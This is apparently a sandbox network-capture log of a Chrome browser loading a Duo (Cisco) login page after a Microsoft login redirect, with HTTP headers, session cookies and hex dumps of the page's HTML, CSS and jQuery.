                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:13 UTC762INHTTP/1.1 302 Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:13 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                          Expires: 0
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Location: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          63192.168.2.165519935.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:14 UTC820OUTGET /email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:48:14 UTC2313INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:14 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 1929
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          X-Duo-Endpoint-Health-Appserver-Url: https://127.0.0.1:53100 https://127.0.0.1:53101 https://127.0.0.1:53102 https://127.0.0.1:53103 https://127.0.0.1:53104 https://127.0.0.1:53105 https://127.0.0.1:63100 https://127.0.0.1:63101 http://127.0.0.1:53106 http://127.0.0.1:53107 http://127.0.0.1:53108 http://127.0.0.1:53109 http://127.0.0.1:53110 http://127.0.0.1:53111 https://localhost:53100 https://localhost:53101 https://localhost:53102 https://localhost:53103 https://localhost:53104 https://localhost:53105 https://localhost:63100 https://localhost:63101
                                                                                                                                          X-Duo-Endpoint-Health-Uri: com-duosecurity-devicehealth://*
                                                                                                                                          X-S3-Assets: ux-asset-commercial.duosecurity.com
                                                                                                                                          Etag: "d84e6b5d8fc68c2aa30d1cab6afc45df3047cb5a"
                                                                                                                                          Set-Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; Path=/; SameSite=None; Secure
                                                                                                                                          Set-Cookie: sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; HttpOnly; Path=/; SameSite=None; Secure
                                                                                                                                          Set-Cookie: sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"; HttpOnly; Path=/; SameSite=None; Secure
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' com-duosecurity-devicehealth://*; frame-ancestors 'none'; img-src 'self' ux-asset-commercial.duosecurity.com; connect-src 'self' https://127.0.0.1:53100 https://127.0.0.1:53101 https://127.0.0.1:53102 https://127.0.0.1:53103 https://127.0.0.1:53104 https://127.0.0.1:53105 https://127.0.0.1:63100 https://127.0.0.1:63101 http://127.0.0.1:53106 http://127.0.0.1:53107 http://127.0.0.1:53108 http://127.0.0.1:53109 http://127.0.0.1:53110 http://127.0.0.1:53111 https://localhost:53100 https://localhost:53101 https://localhost:53102 https://localhost:53103 https://localhost:53104 https://localhost:53105 https://localhost:63100 https://localhost:63101
                                                                                                                                          2024-11-18 05:48:14 UTC1929INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74
                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Login</title><meta charset="utf-8" /><meta name="viewport" content="width=device-widt


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          64192.168.2.165520235.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:15 UTC1071OUTGET /static/css/page/email-first.css?v=8132c HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:16 UTC613INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:15 GMT
                                                                                                                                          Content-Type: text/css
                                                                                                                                          Content-Length: 66281
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-102e9"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:16 UTC15771INData Raw: 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 2c 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 3a 62 65 66 6f 72 65 2c 68 74 6d 6c 2e 62 6f 72 64 65 72 2d 62 6f 78 20 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 3b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 62 61 73 65 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 53 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38
                                                                                                                                          Data Ascii: html.border-box{box-sizing:border-box}html.border-box *,html.border-box *:before,html.border-box *:after{box-sizing:inherit}body{color:#363f44;color:#363f44;color:var(--color-font-base);font-family:"Helvetica Neue",Helvetica,Arial,Sans-serif;font-size:0.8
                                                                                                                                          2024-11-18 05:48:16 UTC16378INData Raw: 68 65 63 6b 65 64 3a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 2e 32 35 72 65 6d 3b 6c 65 66 74 3a 30 2e 32 35 72 65 6d 3b 6c 65 66 74 3a 76 61 72 28 2d 2d 73 69 7a 65 2d 62 61 73 65 2d 34 29 3b 77 69 64 74 68 3a 2e 33 37 35 72 65 6d 3b 68 65 69 67 68 74 3a 2e 36 32 35 72 65 6d 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 2e 31 32 35 72 65 6d 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 2e 31 32 35 72 65 6d 20 73 6f 6c 69 64 20 23 66 66 66 66 66 66 3b 62 6f 72 64 65 72 2d
                                                                                                                                          Data Ascii: hecked::after{box-sizing:border-box;position:absolute;top:0;left:0.25rem;left:0.25rem;left:var(--size-base-4);width:.375rem;height:.625rem;content:"";transform:rotate(45deg);border-bottom:0.125rem solid #ffffff;border-bottom:0.125rem solid #ffffff;border-
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 64 35 34 31 33 62 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 77 61 72 6e 69 6e 67 7b 63 6f 6c 6f 72 3a 23 64 36 36 38 36 36 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 73 75 63 63 65 73 73 7b 63 6f 6c 6f 72 3a 23 36 33 63 35 37 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 36 34 36 34 36 34 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 68 65 61 64 65 72 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 33 36 33 66 34 34 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 68 65 61 64 65 72 2d 6c 69 67 68 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6c 6f 72 2d 66 6f 6e 74 2d 62 6f 64 79 2d 64 61 72 6b 7b 63 6f 6c
                                                                                                                                          Data Ascii: t-error{color:#d5413b}.color-font-warning{color:#d66866}.color-font-success{color:#63c57f}.color-font-disabled{color:#646464}.color-font-inverse{color:#fff}.color-font-header-dark{color:#363f44}.color-font-header-light{color:#fff}.color-font-body-dark{col
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 68 65 61 64 6c 69 6e 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 73 75 62 74 69 74 6c 65 2d 72 65 67 75 6c 61 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 73 75 62 74 69 74 6c 65 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 62 6f 64 79 2d 72 65 67 75 6c 61 72 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 65 69 67 68 74 2d 66 6f 6e 74 2d 62 6f 64 79 2d 62 6f 6c 64 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 7d 2e
                                                                                                                                          Data Ascii: weight:900}.weight-font-headline{font-weight:900}.weight-font-title{font-weight:900}.weight-font-subtitle-regular{font-weight:400}.weight-font-subtitle-bold{font-weight:900}.weight-font-body-regular{font-weight:400}.weight-font-body-bold{font-weight:900}.
                                                                                                                                          2024-11-18 05:48:16 UTC1364INData Raw: 2e 64 65 76 69 63 65 2d 68 65 61 6c 74 68 2d 63 68 65 63 6b 20 2e 73 69 7a 65 2d 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 2d 72 65 73 65 74 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 76 61 72 28 2d 2d 73 69 7a 65 2d 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 2d 72 65 73 65 74 29 7d 2e 64 65 76 69 63 65 2d 68 65 61 6c 74 68 2d 63 68 65 63 6b 20 2e 6c 6f 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 64 65 76 69 63 65 2d 68 65 61 6c 74 68 2d 63 68 65 63 6b 20 2e 64 65 76 69 63 65 2d 68 65 61 6c 74 68 2d 63 68 65 63 6b 2d 6c 6f 61 64 65 72 7b 61 6e 69 6d 61 74 69 6f 6e 3a 6c 6f 61 64 65 72 2d 7a 6f 6f 6d 2d 69 6e 2d 7a 6f 6f 6d 2d 6f 75
                                                                                                                                          Data Ascii: .device-health-check .size-margin-bottom-reset{margin-bottom:0rem;margin-bottom:0rem;margin-bottom:var(--size-margin-bottom-reset)}.device-health-check .loader{margin:0 auto}.device-health-check .device-health-check-loader{animation:loader-zoom-in-zoom-ou


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          65192.168.2.165520335.71.186.1514436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:48:15 UTC1064OUTGET /static/shared/lib/jquery/jquery.min.js?v=ff152 HTTP/1.1
                                                                                                                                          Host: cisco.login.duosecurity.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Cookie: _xsrf="YzBlNTVhNTg2YWM1NDYxNWIzODY2ZTFiNjJkNmU3MzY=|1731908894|26561626896dc0fda90d0e8e6f1cb08112326bcb"; sid="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|1d9f2bb659640aba9c2b6e69df3602e0ea9b8d2b"; sid-init-230486eb6dfc493f83dc10597f2cc7ad="ZTU1OGE2ODMxZDJmNGNmMDk0NDEzMWM1N2JkZDAyMWE=|1731908894|e511b72b619248d3c4c5bdda4422eca533d718e4"
                                                                                                                                          2024-11-18 05:48:16 UTC627INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:48:15 GMT
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          Content-Length: 89501
                                                                                                                                          Connection: close
                                                                                                                                          Server: Duo/1.0
                                                                                                                                          Last-Modified: Fri, 08 Nov 2024 18:29:35 GMT
                                                                                                                                          ETag: "672e588f-15d9d"
                                                                                                                                          Cache-Control: private, no-cache
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'self'; script-src 'self'; font-src 'self'; frame-src 'self' ; frame-ancestors 'none'; img-src 'self' ; connect-src 'self'
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-18 05:48:16 UTC15757INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                          2024-11-18 05:48:16 UTC16378INData Raw: 7b 76 61 72 20 79 3d 22 6e 74 68 22 21 3d 3d 68 2e 73 6c 69 63 65 28 30 2c 33 29 2c 6d 3d 22 6c 61 73 74 22 21 3d 3d 68 2e 73 6c 69 63 65 28 2d 34 29 2c 78 3d 22 6f 66 2d 74 79 70 65 22 3d 3d 3d 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 67 26 26 30 3d 3d 3d 76 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 79 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28
                                                                                                                                          Data Ascii: {var y="nth"!==h.slice(0,3),m="last"!==h.slice(-4),x="of-type"===e;return 1===g&&0===v?function(e){return!!e.parentNode}:function(e,t,n){var r,i,o,a,s,u,l=y!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53 5d 29 7d 7d 29 2c 53 2e 72 65 61 64 79 2e 74 68 65 6e 3d 46 2e 74 68 65 6e 2c 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 45 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 45 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 53 2e 72 65 61 64 79 29 3a 28 45 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 42 29 2c 43 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d
                                                                                                                                          Data Ascii: solveWith(E,[S])}}),S.ready.then=F.then,"complete"===E.readyState||"loading"!==E.readyState&&!E.documentElement.doScroll?C.setTimeout(S.ready):(E.addEventListener("DOMContentLoaded",B),C.addEventListener("load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 2c 69 3d 74 3f 53 2e 66 69 6c 74 65 72 28 74 2c 65 29 3a 65 2c 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 72 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 6e 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 63 6c 65 61 6e 44 61 74 61 28 76 65 28 72 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 6e 26 26 69 65 28 72 29 26 26 79 65 28 76 65 28 72 2c 22 73 63 72 69 70 74 22 29 29 2c 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 72 29 29 3b 72 65 74 75 72 6e 20 65 7d 53 2e 65 78 74 65 6e 64 28 7b 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69
                                                                                                                                          Data Ascii: e,t,n){for(var r,i=t?S.filter(t,e):e,o=0;null!=(r=i[o]);o++)n||1!==r.nodeType||S.cleanData(ve(r)),r.parentNode&&(n&&ie(r)&&ye(ve(r,"script")),r.parentNode.removeChild(r));return e}S.extend({htmlPrefilter:function(e){return e},clone:function(e,t,n){var r,i
                                                                                                                                          2024-11-18 05:48:16 UTC16384INData Raw: 78 2e 73 70 65 65 64 73 3d 7b 73 6c 6f 77 3a 36 30 30 2c 66 61 73 74 3a 32 30 30 2c 5f 64 65 66 61 75 6c 74 3a 34 30 30 7d 2c 53 2e 66 6e 2e 64 65 6c 61 79 3d 66 75 6e 63 74 69 6f 6e 28 72 2c 65 29 7b 72 65 74 75 72 6e 20 72 3d 53 2e 66 78 26 26 53 2e 66 78 2e 73 70 65 65 64 73 5b 72 5d 7c 7c 72 2c 65 3d 65 7c 7c 22 66 78 22 2c 74 68 69 73 2e 71 75 65 75 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 43 2e 73 65 74 54 69 6d 65 6f 75 74 28 65 2c 72 29 3b 74 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 7d 7d 29 7d 2c 74 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 6e 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74
                                                                                                                                          Data Ascii: x.speeds={slow:600,fast:200,_default:400},S.fn.delay=function(r,e){return r=S.fx&&S.fx.speeds[r]||r,e=e||"fx",this.queue(e,function(e,t){var n=C.setTimeout(e,r);t.stop=function(){C.clearTimeout(n)}})},tt=E.createElement("input"),nt=E.createElement("select
